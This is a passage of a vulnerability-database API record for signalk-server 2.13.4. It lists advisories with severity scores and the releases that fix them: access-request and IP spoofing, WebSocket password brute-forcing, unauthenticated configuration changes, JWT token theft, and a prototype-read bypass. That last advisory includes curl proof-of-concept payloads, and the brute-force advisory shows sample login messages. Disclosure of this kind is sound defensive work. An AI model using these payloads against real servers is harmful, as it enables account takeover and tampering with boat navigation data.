Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/922319?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/922319?format=api", "purl": "pkg:npm/signalk-server@2.13.4", "type": "npm", "namespace": "", "name": "signalk-server", "version": "2.13.4", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "2.25.0", "latest_non_vulnerable_version": "2.25.0", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49555?format=api", "vulnerability_id": "VCID-1rr4-c6e1-nya1", "summary": "Signal K Server Vulnerable to Access Request Spoofing\nThe SignalK access request system has two related features that when combined by themselves and with the infromation disclosure vulnerability enable convincing social engineering attacks against administrators.\n\nWhen a device creates an access request, it specifies three fields: `clientId`, `description`, and `permissions`. The SignalK admin UI displays the `description` field prominently to the administrator when showing pending requests, but the actual `permissions` field (which determines the access level granted) is less visible or displayed separately. This allows an attacker to request `admin` permissions while providing a description that suggests readonly access.\n\nThe access request handler trusts the `X-Forwarded-For` HTTP header without validation to determine the client's IP address. This header is intended to preserve the original client IP when requests pass through reverse proxies, but when trusted unconditionally, it allows attackers to spoof their IP address. The spoofed IP is displayed to administrators in the access request approval interface, potentially making malicious requests appear to originate from trusted internal network addresses.\n\nSince device/source names can be enumerated via the information disclosure vulnerability, an attacker can impersonate a legitimate device or source, craft a convincing description, spoof a trusted internal IP address, and request elevated permissions, creating a highly convincing social engineering scenario that increases the likelihood of administrator approval.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-69203", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05869", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05913", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05911", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05921", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-69203" }, { "reference_url": "https://github.com/SignalK/signalk-server", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/SignalK/signalk-server" }, { "reference_url": "https://github.com/SignalK/signalk-server/commit/221aff6cd89c56308084d1781b3abbf938605bd3", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/SignalK/signalk-server/commit/221aff6cd89c56308084d1781b3abbf938605bd3" }, { "reference_url": "https://github.com/SignalK/signalk-server/releases/tag/v2.19.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-02T19:02:06Z/" } ], "url": "https://github.com/SignalK/signalk-server/releases/tag/v2.19.0" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69203", "reference_id": "CVE-2025-69203", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69203" }, { "reference_url": "https://github.com/advisories/GHSA-vfrf-vcj7-wvr8", "reference_id": "GHSA-vfrf-vcj7-wvr8", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-vfrf-vcj7-wvr8" }, { "reference_url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-vfrf-vcj7-wvr8", "reference_id": "GHSA-vfrf-vcj7-wvr8", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-02T19:02:06Z/" } ], "url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-vfrf-vcj7-wvr8" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/73159?format=api", "purl": "pkg:npm/signalk-server@2.19.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2e2f-qt4n-dqa7" }, { "vulnerability": "VCID-3s8j-v31f-pyaf" }, { "vulnerability": "VCID-jq2a-wxb1-dufm" }, { "vulnerability": "VCID-ndfm-uuf3-nbfg" }, { "vulnerability": "VCID-v11p-jkzw-vkar" }, { "vulnerability": "VCID-xvyj-f4ps-kycx" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/signalk-server@2.19.0" } ], "aliases": [ "CVE-2025-69203", "GHSA-vfrf-vcj7-wvr8" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-1rr4-c6e1-nya1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/93469?format=api", "vulnerability_id": "VCID-2e2f-qt4n-dqa7", "summary": "Signal K Server's WebSocket Login Endpoint Lacks Rate Limiting (Credential Brute-Force)\n## Summary\n\nThe HTTP login endpoints (`POST /login` and `POST /signalk/v1/auth/login`) are protected by `express-rate-limit` (default: 100 attempts per 10-minute window, configurable via `HTTP_RATE_LIMITS`). The WebSocket login path — sending `{login: {username, password}}` messages over an established WebSocket connection — calls `app.securityStrategy.login()` directly without any rate limiting.\n\nAn attacker can bypass HTTP rate limiting entirely by opening a WebSocket connection and attempting unlimited password guesses at the speed bcrypt allows (~20 attempts/sec with 10 salt rounds).\n\n## Details\n\n**Vulnerable code:** `src/interfaces/ws.ts`, function `processLoginRequest` (lines 753-780)\n\nThe function directly calls `app.securityStrategy.login(msg.login.username, msg.login.password)` with no throttling or attempt tracking.\n\n**Rate-limited HTTP path for comparison:** `src/tokensecurity.ts` lines 609-617 apply `loginLimiter` middleware to the HTTP login routes at line 637.\n\n## Steps to Reproduce\n\n1. Start Signal K server with security enabled\n2. Open a WebSocket connection to `ws://server:3000/signalk/v1/stream?subscribe=none`\n3. Wait for the hello message\n4. Send login attempts in rapid succession:\n ```json\n {\"requestId\": \"1\", \"login\": {\"username\": \"admin\", \"password\": \"guess1\"}}\n {\"requestId\": \"2\", \"login\": {\"username\": \"admin\", \"password\": \"guess2\"}}\n ```\n5. Observe that all attempts are processed without any 429 response or throttling\n6. For comparison, send 100+ HTTP POST requests to `/signalk/v1/auth/login` — the 101st returns 429\n\nA POC script is available that demonstrates both the HTTP rate limiting working correctly and the WebSocket path accepting unlimited attempts.\n\n## Impact\n\n- Credential brute-forcing via the WebSocket protocol at ~20 attempts/sec (bcrypt-limited)\n- Complete bypass of the HTTP rate limiting defense\n- A single WebSocket connection is sufficient for unlimited attempts\n- With multiple parallel connections, throughput multiplies\n- A 10,000-word dictionary attack completes in ~8 minutes over a single connection\n\nSignal K servers are commonly deployed on boat networks where they may be accessible to other devices on the same LAN.\n\n## CWE\n\nCWE-307: Improper Restriction of Excessive Authentication Attempts\n\n## Suggested Fix\n\nTrack failed login attempts per remote IP in a shared store (or reuse the existing express-rate-limit store) that is checked in both the HTTP login middleware and the processLoginRequest WebSocket handler.\n\n## Context\n\nFound while building an open source maritime security scanner. Verified on v2.24.0 (current master).\n\nDiscovered by Mark Curphey", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41893", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.1118", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.11173", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.11057", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.11138", "published_at": "2026-06-07T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41893" }, { "reference_url": "https://github.com/SignalK/signalk-server", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/SignalK/signalk-server" }, { "reference_url": "https://github.com/SignalK/signalk-server/commit/215d81eb700d5419c3396a0fbf23f2e246dfac2d", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-14T17:50:07Z/" } ], "url": "https://github.com/SignalK/signalk-server/commit/215d81eb700d5419c3396a0fbf23f2e246dfac2d" }, { "reference_url": "https://github.com/SignalK/signalk-server/pull/2568", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-14T17:50:07Z/" } ], "url": "https://github.com/SignalK/signalk-server/pull/2568" }, { "reference_url": "https://github.com/SignalK/signalk-server/releases/tag/v2.25.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-14T17:50:07Z/" } ], "url": "https://github.com/SignalK/signalk-server/releases/tag/v2.25.0" }, { "reference_url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-vmfm-ch9h-5c7g", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-14T17:50:07Z/" } ], "url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-vmfm-ch9h-5c7g" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41893", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41893" }, { "reference_url": "https://github.com/advisories/GHSA-vmfm-ch9h-5c7g", "reference_id": "GHSA-vmfm-ch9h-5c7g", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-vmfm-ch9h-5c7g" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/111518?format=api", "purl": "pkg:npm/signalk-server@2.25.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/signalk-server@2.25.0" } ], "aliases": [ "CVE-2026-41893", "GHSA-vmfm-ch9h-5c7g" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-2e2f-qt4n-dqa7" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89499?format=api", "vulnerability_id": "VCID-3s8j-v31f-pyaf", "summary": "Signal K Server: Unauthenticated Source Priorities Manipulation\n## Summary\n\nThe SignalK Server exposes an unauthenticated HTTP endpoint that allows remote attackers to modify navigation data source priorities. This endpoint, accessible via `PUT /signalk/v1/api/sourcePriorities`, does not enforce authentication or authorization checks and directly assigns user-controlled input to the server configuration.\n\nAs a result, attackers can influence which GPS, AIS, or other sensor data sources are trusted by the system. The changes are immediately applied and persisted to disk, allowing the manipulation to survive server restarts.\n\n### Affected Component\n- **File**: `src/serverroutes.ts`\n- **Endpoint**: `PUT /signalk/v1/api/sourcePriorities` (also accessible at `/skServer/sourcePriorities`)\n- **Lines**: 1064-1076\n- **Function**: Source priorities configuration handler\n\n### Vulnerable Code\n\n```typescript\n// src/serverroutes.ts - Lines 1064-1076\napp.put(\n `${SERVERROUTESPREFIX}/sourcePriorities`,\n (req: Request, res: Response) => {\n app.config.settings.sourcePriorities = req.body\n app.activateSourcePriorities()\n writeSettingsFile(app, app.config.settings, (err: any) => {\n if (err) {\n res\n .status(500)\n .send('Unable to save to sourcePrefences in settings file')\n } else {\n res.json({ result: 'ok' })\n }\n })\n }\n)\n```\n## Vulnerability Characteristics\n\n**Missing Authentication**: The endpoint has zero authentication middleware, allowing unauthenticated access from any network-adjacent attacker.\n\n**Direct Configuration Assignment**: User-supplied request body is directly assigned to app.config.settings.sourcePriorities without validation or sanitization.\n\n**Persistent Storage**: Malicious configuration is written to disk via writeSettingsFile(), ensuring changes survive server restarts.\n**Live Configuration Update**: Changes take effect immediately via activateSourcePriorities(), affecting live navigation data processing.\n\n**No Input Validation**: No JSON schema validation, type checking, or field allowlisting is performed on the request body.\n\n## Impact\n- **Navigation Data Manipulation**: Attackers can modify source priorities to change which existing, active source's data is being used", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33951", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00102", "scoring_system": "epss", "scoring_elements": "0.27451", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00102", "scoring_system": "epss", "scoring_elements": "0.275", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00102", "scoring_system": "epss", "scoring_elements": "0.27538", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00102", "scoring_system": "epss", "scoring_elements": "0.27589", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33951" }, { "reference_url": "https://github.com/SignalK/signalk-server", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/SignalK/signalk-server" }, { "reference_url": "https://github.com/SignalK/signalk-server/releases/tag/v2.24.0-beta.1", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/SignalK/signalk-server/releases/tag/v2.24.0-beta.1" }, { "reference_url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-gfmv-vh34-h2x5", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-gfmv-vh34-h2x5" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33951", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33951" }, { "reference_url": "https://github.com/advisories/GHSA-gfmv-vh34-h2x5", "reference_id": "GHSA-gfmv-vh34-h2x5", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-gfmv-vh34-h2x5" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110693?format=api", "purl": "pkg:npm/signalk-server@2.24.0-beta.1", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/signalk-server@2.24.0-beta.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1011716?format=api", "purl": "pkg:npm/signalk-server@2.24.0-beta.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2e2f-qt4n-dqa7" }, { "vulnerability": "VCID-jq2a-wxb1-dufm" }, { "vulnerability": "VCID-ndfm-uuf3-nbfg" }, { "vulnerability": "VCID-veqf-x77b-4bf7" }, { "vulnerability": "VCID-xvyj-f4ps-kycx" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/signalk-server@2.24.0-beta.3" } ], "aliases": [ "CVE-2026-33951", "GHSA-gfmv-vh34-h2x5" ], "risk_score": 3.4, "exploitability": "0.5", "weighted_severity": "6.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-3s8j-v31f-pyaf" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49556?format=api", "vulnerability_id": "VCID-84tp-z2dz-u7at", "summary": "Signal K Server vulnerable to JWT Token Theft via WebSocket Enumeration and Unauthenticated Polling\nSignalK Server exposes two features that can be chained together to steal JWT authentication tokens without any prior authentication. The attack combines WebSocket-based request enumeration with unauthenticated polling of access request status.\n\n**Unauthenticated WebSocket Request Enumeration**: When a WebSocket client connects to the SignalK stream endpoint with the `serverevents=all` query parameter, the server sends all cached server events including `ACCESS_REQUEST` events that contain details about pending access requests. The `startServerEvents` function iterates over `app.lastServerEvents` and writes each cached event to any connected client without verifying authorization level. Since WebSocket connections are allowed for readonly users (which includes unauthenticated users when `allow_readonly` is true), attackers receive these events containing request IDs, client identifiers, descriptions, requested permissions, and IP addresses.\n\n**Unauthenticated Token Polling**: The access request status endpoint at `/signalk/v1/access/requests/:id` returns the full state of an access request without requiring authentication. When an administrator approves a request, the response includes the issued JWT token in plaintext. The `queryRequest` function returns the complete request object including the token field, and the REST endpoint uses readonly authentication, allowing unauthenticated access.\n\nAn attacker has two paths to exploit these vulnerabilities:\n\n1. The attacker creates their own access request (using the IP spoofing vulnerability to craft a convincing spoofed request), then polls their own request ID until an administrator approves it, receiving the JWT token.\n\n2. The attacker passively monitors the WebSocket stream to discover request IDs from legitimate devices, then polls those IDs and steals the JWT tokens when administrators approve them, hijacking legitimate device credentials.\n\nBoth paths require zero authentication and enable complete authentication bypass.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-68620", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.17657", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.17732", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.17766", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.17771", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-68620" }, { "reference_url": "https://github.com/SignalK/signalk-server", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/SignalK/signalk-server" }, { "reference_url": "https://github.com/SignalK/signalk-server/commit/221aff6cd89c56308084d1781b3abbf938605bd3", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/SignalK/signalk-server/commit/221aff6cd89c56308084d1781b3abbf938605bd3" }, { "reference_url": "https://github.com/SignalK/signalk-server/releases/tag/v2.19.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-01-02T18:58:09Z/" } ], "url": "https://github.com/SignalK/signalk-server/releases/tag/v2.19.0" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68620", "reference_id": "CVE-2025-68620", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68620" }, { "reference_url": "https://github.com/advisories/GHSA-fq56-hvg6-wvm5", "reference_id": "GHSA-fq56-hvg6-wvm5", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-fq56-hvg6-wvm5" }, { "reference_url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-fq56-hvg6-wvm5", "reference_id": "GHSA-fq56-hvg6-wvm5", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-01-02T18:58:09Z/" } ], "url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-fq56-hvg6-wvm5" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/73159?format=api", "purl": "pkg:npm/signalk-server@2.19.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2e2f-qt4n-dqa7" }, { "vulnerability": "VCID-3s8j-v31f-pyaf" }, { "vulnerability": "VCID-jq2a-wxb1-dufm" }, { "vulnerability": "VCID-ndfm-uuf3-nbfg" }, { "vulnerability": "VCID-v11p-jkzw-vkar" }, { "vulnerability": "VCID-xvyj-f4ps-kycx" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/signalk-server@2.19.0" } ], "aliases": [ "CVE-2025-68620", "GHSA-fq56-hvg6-wvm5" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-84tp-z2dz-u7at" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90081?format=api", "vulnerability_id": "VCID-jq2a-wxb1-dufm", "summary": "Signal K Server: Arbitrary Prototype Read via `from` Field Bypass\n## Summary \n\nThe /signalk/v1/applicationData/... JSON-patch endpoint allows users to modify stored application data. To prevent Prototype Pollution, the developers implemented an isPrototypePollutionPath guard. However, this guard only checks the path property of incoming JSON-patch objects. It completely fails to check the from property. Because JSON-patch operations like copy and move extract data using the from property path, an attacker can construct a payload where from targets /__proto__/someProperty, completely evading the security check and successfully executing an Arbitrary Prototype Read.\n\nWhile this does not allow arbitrary code execution (as the destination path remains protected from __proto__), it does allow a user to exfiltrate internal Node functions and prototype state into their own application data.\n\n## Vulnerability Root Cause \n\nFile: src/interfaces/applicationData.js (Lines 48-57)\n```\nconst DANGEROUS_PATH_SEGMENTS = ['__proto__', 'constructor', 'prototype']\n\nfunction isPrototypePollutionPath(pathString) {\n const segments = pathString.split(/[./]/)\n return segments.some((seg) => DANGEROUS_PATH_SEGMENTS.includes(seg))\n}\n\nfunction hasPrototypePollutionPatch(patches) {\n return patches.some(\n // [!VULNERABLE] Only checks patch.path, completely ignores patch.from\n (patch) => patch.path && isPrototypePollutionPath(patch.path) \n )\n}\n```\nAt Line 201:\n```\nif (hasPrototypePollutionPatch(req.body)) {\n res.status(400).send('invalid patch path')\n return\n}\njsonpatch.apply(applicationData, req.body) // jsonpatch natively resolves 'from'\n\n```\n## Proof of Concept (PoC)\n\nVerify the Developer Guard Works (The Blocked Payload):\n```\ncurl -X POST http://localhost:3000/signalk/v1/applicationData/global/testapp/1.0 \\\n -H \"Content-Type: application/json\" \\\n -H \"Authorization: Bearer $TOKEN\" \\\n -d '[{\"op\": \"add\", \"path\": \"/__proto__/polluted\", \"value\": \"hacked\"}]'\n```\nResult: 400 Bad Request - invalid patch path\n\nExecute the Bypass (The Malicious Payload):\n```\ncurl -X POST http://localhost:3000/signalk/v1/applicationData/global/testapp/1.0 \\\n -H \"Content-Type: application/json\" \\\n -H \"Authorization: Bearer $TOKEN\" \\\n -d '[{\"op\": \"copy\", \"from\": \"/__proto__/toString\", \"path\": \"/stolen\"}]'\n```\nResult: 200 OK - ApplicationData saved The security guard is bypassed and the json-patch engine successfully copies the __proto__ internal function reference.\n\n<img width=\"1222\" height=\"230\" alt=\"Screenshot 2026-03-24 150440\" src=\"https://github.com/user-attachments/assets/5ae580fd-284f-4bef-adc8-31b50b8751b6\" />\n\n## Security Impact\nThis vulnerability allows a low-privileged authenticated user to bypass prototype boundary filtering to extract internal functions and properties from the global prototype object this violates data isolation and lets a user read more than they should.\n\n## Fixing Arbitrary Prototype Read\n\nThe hasPrototypePollutionPatch function must be updated to inspect ALL path-related fields:\n```\nfunction hasPrototypePollutionPatch(patches) {\n return patches.some(\n (patch) => \n (patch.path && isPrototypePollutionPath(patch.path)) ||\n (patch.from && isPrototypePollutionPath(patch.from))\n )\n}\n```", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35038", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00067", "scoring_system": "epss", "scoring_elements": "0.2089", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00067", "scoring_system": "epss", "scoring_elements": "0.20769", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00067", "scoring_system": "epss", "scoring_elements": "0.20833", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00067", "scoring_system": "epss", "scoring_elements": "0.20876", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35038" }, { "reference_url": "https://github.com/SignalK/signalk-server", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.1", "scoring_system": "cvssv4", "scoring_elements": 